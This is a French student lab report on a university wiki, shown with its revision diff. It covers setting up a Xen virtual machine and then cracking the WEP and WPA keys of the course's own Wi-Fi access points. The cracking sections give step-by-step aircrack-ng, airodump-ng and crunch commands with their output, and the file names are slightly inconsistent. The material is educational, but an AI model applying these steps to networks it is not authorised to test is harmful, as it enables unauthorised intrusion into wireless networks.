TP sysres IMA2a5 2021/2022 G12 : Différence entre versions

De Wiki d'activités IMA
(Création machine virtuelle)
(Création machine virtuelle)
Ligne 58 : Ligne 58 :
  
  
==  
+
== Craquage de clés : ==
Craquage clé WEP: ==
+
 
+
'''Craquage clé WEP:'''
  
 
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
 
Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".
Ligne 127 : Ligne 127 :
 
             KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ]  
 
             KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ]  
 
Decrypted correctly: 100%
 
Decrypted correctly: 100%
 +
 +
'''Craquage clé WPA :'''
 +
 +
On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :
 +
 +
apt-get install aircrack-ng
 +
 +
Listing de toutes les interfaces Wi-Fi
 +
 +
airmon-ng
 +
 +
On obtient la liste ci-dessous :
 +
 +
PHY Interface   Driver   Chipset
 +
phy0 wlx40a5ef059e47   rt2800usb      Ralink Technology, Corp. RT5370
 +
 +
On passe la carte Wifi en mode monitor :
 +
 +
airmon-ng start wlx40a5ef059e47
 +
 +
On observe les trames de réseaux avec la commande :
 +
 +
airodump-ng wlan0mon
 +
 +
On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8
 +
On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :
 +
 +
airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon
 +
 +
On attend environ 1/4 d'heure pour récupérer suffisamment de trames.
 +
 +
Exécution de Aircrack :
 +
 +
On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels.
 +
On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :
 +
 +
crunch 8 8 0123456789 >> Dico_krakotte01.txt
 +
 +
Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :
 +
 +
Cependant si je lançais la commande aircrack-ng tout de suite, ma machine mettrait un très long moment à trouver la clef en testant toutes les possibilités. Pour pallier ce problème, j'ai divisé mon dictionnaire en 5 fichiers distincts avec
 +
 +
split -b 200m Dico_krakotte01.txt
 +
 +
On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés
 +
 +
ls
 +
>> Dico_Krakotte01.txt  xaa
 +
 +
Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.
 +
 +
Cassage de la clef WPA :
 +
 +
aircrack-ng -w xaa krakotte01.cap

Version du 29 novembre 2021 à 11:27


Création machine virtuelle

Dans un premier temps, on dois créer une machine virtuelle sur le serveur distant. On s'y connecte donc en tant que superuser :

 ssh -4 root@capbreton.plil.info

On créer alors la machine grâce à la commande qui suit :

 xen-create-image --force --hostname=Battlefield --ip=193.48.57.172 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster

La machine est alors créée sur capbreton. On passe à la configuration des disques, pour créer un RAID5 :

 lvcreate -L1G -n Battlefield1 virtual 
 lvcreate -L1G -n Battlefield2 virtual 
 lvcreate -L1G -n Battlefield3 virtual 
 lvcreate -L1G -n Battlefield4 virtual

On augmente ensuite la taille des 4 disques :

 lvextend -L +9G /dev/virtual/Battlefield1
 lvextend -L +9G /dev/virtual/Battlefield2
 lvextend -L +9G /dev/virtual/Battlefield3
 lvextend -L +9G /dev/virtual/Battlefield4


On vérifie que les disques sont bien installés :

 lvdisplay 

Détail d'un disque installé :

 --- Logical volume ---
 LV Path                /dev/virtual/Battlefield1
 LV Name                Battlefield1
 VG Name                virtual
 LV UUID                gvf9pC-5DAB-1YGt-fYJ1-ecrM-nZG2-ZFCf41
 LV Write Access        read/write
 LV Creation host, time capbreton, 2021-09-24 08:40:48 +0200
 LV Status              available
 # open                 0
 LV Size                10.00 GiB
 Current LE             2560
 Segments               2
 Allocation             inherit
 Read ahead sectors     auto
 - currently set to     256
 Block device           254:57

Puis on formate les disques :

mke2fs /dev/virtual/Battlefield1
mke2fs /dev/virtual/Battlefield2
mke2fs /dev/virtual/Battlefield3
mke2fs /dev/virtual/Battlefield4


Craquage de clés :

Craquage clé WEP:

Pour cette partie, nous allons casser la clé WEP du réseau "Cracotte 01".

Tout d'abord, on installe l'utilitaire aircrack-ng

 su -
 apt install aircrack-ng

On prend une clé USB Wifi et on vérifie qu'elle est reconnue par l'ordinateur :

 lsusb
Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 010: ID 413c:2005 Dell Computer Corp. RT7D50 Keyboard
Bus 001 Device 007: ID 413c:301a Dell Computer Corp. 
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clé wifi est bien reconnue par le PC : Bus 003 Device 009: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

On récupère le nom de l'interface de la clé Wifi :

airmon-ng 


On renomme l'interface en wlan0mon, nous allons utiliser la commande suivante pour passer la carte Wifi en monitor :

 airmon-ng start wlx40a5ef059e47

On va ensuite faire cette commande afin d'écouter les trames Wifi de la clé USB:

 airodump-ng wlan0mon

On obtient alors les informations suivantes :

BSSID                 PWR     Beacons    #Data,   #/s      CH      MB      ENC     CIPHER   AUTH ESSID
04:DA:D2:9C:50:50     -40           2      3       4        3      54e      WEP     WEP         cracotte01

On récupère dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte01 :

airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:50 wlan0mon

On attends qu'il y ai au moins 30 000 trames récupérées puis on lance le crackage de la clé :

 aircrack-ng lcrack-01.cap

Après 5-10min, on obtient le code de la clé Wifi :

                                   Aircrack-ng 1.5.2 


                      [00:00:00] Tested 721 keys (got 665952 IVs)

  KB    depth   byte(vote)
   0    1/  2   27(703488) 1D(696832) 92(694528) EB(692224) A6(689408) 9D(688896) 
   1    2/  1   D0(698112) 65(697344) A7(696320) 0D(695296) 21(693504) 3A(692224) 
   2    1/  3   9B(701440) FC(697344) 2E(695808) 6D(692224) 57(689152) CF(688640) 
   3    1/  5   BB(703232) 30(700416) A6(699392) AB(699136) C2(696064) 36(695296) 
   4   13/  4   35(687104) D6(686592) 76(686080) 23(685824) 48(685824) 63(685568) 

            KEY FOUND! [ 12:34:56:78:9A:BC:02:CB:A9:87:65:43:21 ] 

Decrypted correctly: 100%

Craquage clé WPA :

On vérifie que notre utilitaire aircrack est bien installé, sinon on refait la commande :

apt-get install aircrack-ng

Listing de toutes les interfaces Wi-Fi

airmon-ng

On obtient la liste ci-dessous :

PHY	Interface	  Driver	  Chipset
phy0	wlx40a5ef059e47	  rt2800usb       Ralink Technology, Corp. RT5370 

On passe la carte Wifi en mode monitor :

airmon-ng start wlx40a5ef059e47	

On observe les trames de réseaux avec la commande :

airodump-ng wlan0mon

On récupère le BSSID de krakotte01 et le channel : 44:AD:D9:5F:87:00 sur le channel 8 On enregistre alors les trames qui passent sur krakotte01 dans un fichier krakotte.txt :

airodump-ng -c 8 --bssid 44:AD:D9:5F:87:00 -w krakotte.txt wlan0mon

On attend environ 1/4 d'heure pour récupérer suffisamment de trames.

Exécution de Aircrack :

On créé alors un dictionnare contenant l'ensemble des mots de passes potentiels. On sait que la clé WPA est composée de 8 chiffres aléatoires, donc le dictionnaire contient 100 000 000 possibilités et est créé grâce à la commande suivante :

crunch 8 8 0123456789 >> Dico_krakotte01.txt

Pour accélerer le processus de crackage, on divise le dictionnaire en 5 fichiers :

Cependant si je lançais la commande aircrack-ng tout de suite, ma machine mettrait un très long moment à trouver la clef en testant toutes les possibilités. Pour pallier ce problème, j'ai divisé mon dictionnaire en 5 fichiers distincts avec

split -b 200m Dico_krakotte01.txt

On peut vérifier que cela a bien fonctionné en regardant le contenu des fichiers générés

ls
>> Dico_Krakotte01.txt   xaa

Posséder ces différents fichiers va me permettre d'exécuter la commande aircrack-ng sur d'autres zabeth de manière à diminuer le temps de recherche du mot de passe.

Cassage de la clef WPA :

aircrack-ng -w xaa krakotte01.cap